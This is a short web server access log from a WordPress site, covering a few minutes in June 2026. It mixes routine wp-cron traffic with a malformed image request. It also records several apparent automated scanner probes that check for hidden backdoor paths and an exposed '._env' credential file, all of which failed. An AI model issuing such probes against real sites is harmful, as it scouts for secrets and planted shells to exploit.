36.133.108.125 - - [25/Jun/2026:14:04:09 +0800] "HEAD /wp-includes/fonts/warez HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0"
36.133.115.36 - - [25/Jun/2026:14:07:30 +0800] "POST /wp-cron.php?doing_wp_cron=1782367650.3015708923339843750000 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.121 - - [25/Jun/2026:14:07:30 +0800] "HEAD /wp-includes/manager HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36"
36.133.115.36 - - [25/Jun/2026:14:09:22 +0800] "POST /wp-cron.php?doing_wp_cron=1782367762.9284400939941406250000 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
82.156.103.203 - - [25/Jun/2026:14:09:22 +0800] "GET /wp-content/uploads/2026/01/1768527486-Article_images_W900%C3%97500px202601165.webp%20900w,%20http://cqqizhou.com/wp-content/uploads/2026/01/1768527486-Article_images_W900%C3%97500px202601165-300x167.webp%20300w,%20http://cqqizhou.com/wp-content/uploads/2026/01/1768527486-Article_images_W900%C3%97500px202601165-768x427.webp%20768w HTTP/1.1" 301 5 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.119 Safari/537.36"
82.156.103.203 - - [25/Jun/2026:14:09:24 +0800] "GET /wp-content/uploads/2026/01/1768527486-Article_images_W900%C3%97500px202601165.webp%20900w,%20http:/cqqizhou.com/wp-content/uploads/2026/01/1768527486-Article_images_W900%C3%97500px202601165-300x167.webp%20300w,%20http:/cqqizhou.com/wp-content/uploads/2026/01/1768527486-Article_images_W900%C3%97500px202601165-768x427.webp%20768w HTTP/1.1" 404 9500 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.119 Safari/537.36"
36.133.115.36 - - [25/Jun/2026:14:11:19 +0800] "POST /wp-cron.php?doing_wp_cron=1782367879.4115500450134277343750 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.121 - - [25/Jun/2026:14:11:19 +0800] "HEAD /._env HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)"
